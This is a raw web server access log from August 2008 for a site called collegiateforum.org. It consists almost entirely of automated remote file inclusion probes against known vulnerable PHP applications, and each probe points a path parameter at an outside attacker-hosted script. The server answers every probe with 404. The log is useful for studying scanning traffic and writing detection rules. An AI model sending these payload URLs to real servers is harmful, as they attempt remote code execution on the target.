65.98.89.43 - - [03/Aug/2008:19:17:47 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:17:47 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:17:48 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:17:48 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:17:48 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:17:48 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:17:48 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:17:48 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:18:02 -0700] "GET /logs/access_080121.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:18:02 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:18:03 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:18:08 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:18:08 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:18:09 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:18:10 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:18:10 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:18:11 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:18:48 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:18:48 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:18:48 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:19:11 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:19:14 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:19:16 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:19:20 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:19:21 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:19:43 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:19:43 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:19:43 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:19:44 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:19:59 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:19:59 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:21:14 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:21:15 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:19:21:15 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:19:21:15 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:19:21:16 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:19:21:16 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:21:16 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:19:21:16 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:19:21:16 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:21:19 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:21:20 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.111.37.210 - - [03/Aug/2008:19:21:21 -0700] "GET /index.php?lng=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
65.111.37.210 - - [03/Aug/2008:19:21:21 -0700] "GET /index.php?lng=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:23:03 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:23:04 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:23:04 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
195.39.5.203 - - [03/Aug/2008:19:23:05 -0700] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [03/Aug/2008:19:23:10 -0700] "GET //skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [03/Aug/2008:19:23:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:23:13 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:19:23:14 -0700] "GET //include/write.php?dir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:19:23:15 -0700] "GET /logs//include/write.php?dir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
65.111.37.210 - - [03/Aug/2008:19:23:42 -0700] "GET /logs/access_080121.log/index.php?lng=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
65.111.37.210 - - [03/Aug/2008:19:23:42 -0700] "GET /logs/index.php?lng=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
65.111.37.210 - - [03/Aug/2008:19:23:43 -0700] "GET /logs/access_080121.log/index.php?lng=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
65.111.37.210 - - [03/Aug/2008:19:23:44 -0700] "GET /logs/index.php?lng=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:23:46 -0700] "GET /logs/access_080421.log//Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:24:01 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:24:01 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:24:02 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
194.79.75.195 - - [03/Aug/2008:19:24:09 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
194.79.75.195 - - [03/Aug/2008:19:24:09 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:24:31 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:24:31 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:19:25:11 -0700] "GET /logs/access_080519.log//include/write.php?dir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:19:25:21 -0700] "GET /logs/access_080331.log//include/write.php?dir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:25:37 -0700] "GET /logs/access_080428.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:25:37 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:25:37 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:25:53 -0700] "GET /logs/access_080421.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
146.155.63.15 - - [03/Aug/2008:19:25:59 -0700] "GET /logs/access.log//include/write.php?dir=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
67.195.37.178 - - [03/Aug/2008:19:28:50 -0700] "GET /Jonathan_Fantini_Porter/index.php HTTP/1.0" 200 23858 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
24.47.133.61 - - [03/Aug/2008:19:29:27 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
24.47.133.61 - - [03/Aug/2008:19:29:27 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
24.47.133.61 - - [03/Aug/2008:19:29:27 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
77.92.80.1 - - [03/Aug/2008:19:30:42 -0700] "GET /logs/access_080421.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
77.92.80.1 - - [03/Aug/2008:19:30:42 -0700] "GET //ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
77.92.80.1 - - [03/Aug/2008:19:30:43 -0700] "GET /logs//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:31:57 -0700] "GET /logs/access_080331.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:31:57 -0700] "GET /templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:31:57 -0700] "GET /logs/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
193.46.236.234 - - [03/Aug/2008:19:32:03 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7) Gecko/20040707 Firefox/0.9.2" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:32:18 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:32:28 -0700] "GET /logs/access_080421.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:32:29 -0700] "GET //ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:32:29 -0700] "GET /logs//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
217.172.161.101 - - [03/Aug/2008:19:32:37 -0700] "GET /templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:32:41 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:19:32:51 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:19:32:51 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:19:32:51 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:19:32:52 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:19:32:52 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
200.126.108.198 - - [03/Aug/2008:19:32:52 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
209.97.201.148 - - [03/Aug/2008:19:33:06 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
209.97.201.148 - - [03/Aug/2008:19:33:06 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
209.97.201.148 - - [03/Aug/2008:19:33:06 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:19:33:17 -0700] "GET /logs/access_080211.log/templates/headline_temp.php?nst_inc=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
200.14.46.18 - - [03/Aug/2008:19:33:52 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.14.46.18 - - [03/Aug/2008:19:33:52 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.14.46.18 - - [03/Aug/2008:19:33:52 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.14.46.18 - - [03/Aug/2008:19:33:52 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.14.46.18 - - [03/Aug/2008:19:33:52 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
